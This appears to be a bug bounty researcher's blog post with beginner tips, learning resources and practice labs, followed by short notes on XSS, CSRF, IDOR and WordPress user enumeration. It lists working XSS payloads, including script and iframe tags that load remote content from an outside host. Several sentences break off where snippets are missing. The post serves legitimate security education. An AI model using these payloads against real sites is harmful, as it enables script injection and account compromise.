Contents of this blog will continue to change over time meaning information may be added or removed without any notice.
My first vulnerability was submitted to Uber on October 13, 2015. I joined the Synack Red Team (SRT) in January 2017 and shortly afterwards in June 2017 I joined Synack as a Security Analyst.
Bug Bounty Programs
Bug bounty programs are setup by companies who want security researchers to look for vulnerabilities on their assets (web and/or mobile application, APIs, etc). Some bug bounties are responsible disclosure only programs but many others will give you a reward for finding vulnerabilities and reporting them. There are platforms out there such as Synack, HackerOne, and BugCrowd. Keep in mind for Synack you need to go through a vetting process; interview, assessment, and background check, to be able to join but it is well worth it since reports are usually reviewed and paid out within 24 hours of submission.
Blogs, HackerOne Hacktivity, and Web Hacking 101 by Pete Yaworski have always been my go to places to learn more about vulnerabilities out there. The HackerOne Hacktivity page contains so much useful information from all the disclosed reports and by being able to go through most of them you can get an idea of each vulnerability out there. You can use the same method as the person in the disclosed report or better yet combine your method and their method together to find a vulnerability. This is how you start to learn and develop your knowledge base.
You can view more blogs at: HackerOne - Hacker Blogs We Love Reading
Web Hacking Pro Tips
- Web Hacking 101 by Pete Yaworski
- Breaking into Information Security: Learning the Ropes 101 by Andrew Gill
- Damn Vulnerability Web Application
- OWASP WebGoat
- OWASP Juice Shop v2.23.0 - Instance available on Heroku
- OWASP Vulnable Web Applications Directory Project
Vulnerabilities & Payloads
In this section it will continue to change but I will be providing different type of payloads you can use for different type of vulnerabilities.
Cross-site Scripting (XSS)
You can use the payload: https://unlvcsec.herokuapp.com/#/search?q=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E to execute an alert which demonstrates XSS. This will also demonstrate access to the DOM and should be shown instead of only using
There will always be different type of scenarios and you’ll have to use a different payload for each one. Here are a couple of examples:
- "><img src=x onerror=alert(document.domain)>
- <script src=//0q.pe>
- <iframe src=//0q.pe>
You can also use a useful tool called XSSHunter which can be used to take your XSS to a whole new level.
Cross-site Request Forgery (CSRF)
OWASP 2013 Top 10 - CSRF
CSRF will allow an attacker to perform a sensitive action on another users account without their consent if the victim visits a website or a link if the website does not provide CSRF protection such as a CSRF token or Authorization header.
You can easily create a CSRF proof of concept by getting the request and right click -> Engagement Tools -> Generate CSRF PoC
There will also be situations where the request will contain JSON and a regular CSRF proof of concept will not work.
Insecure Direct Object Reference (IDOR)
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
For example, the follow HTTP request contains the parameter
article_id in the body and when you change the
42872819 you are able to rate the transaction for another user.
If you have able to find a file upload location which reveals where your file is being saved and you’re able to access it you can try achieving command injection.
There are a couple of programs which will accept these WordPress endpoints which reveal users and an swf which allows 401 basic auth attacks.
When the WordPress instance still contains the swfupload.swf you can go to
http://126.96.36.199 is password protected. To create a directory that is password protected you can do the following command in your webserver which will create a .htpasswd file.
And creating a .htaccess in the directory you would like to protect.
The follow endpoints allow you to possibly recover usernames on the WordPress instance.
These endpoints will allow you to obtain the users registered in the WordPress instance.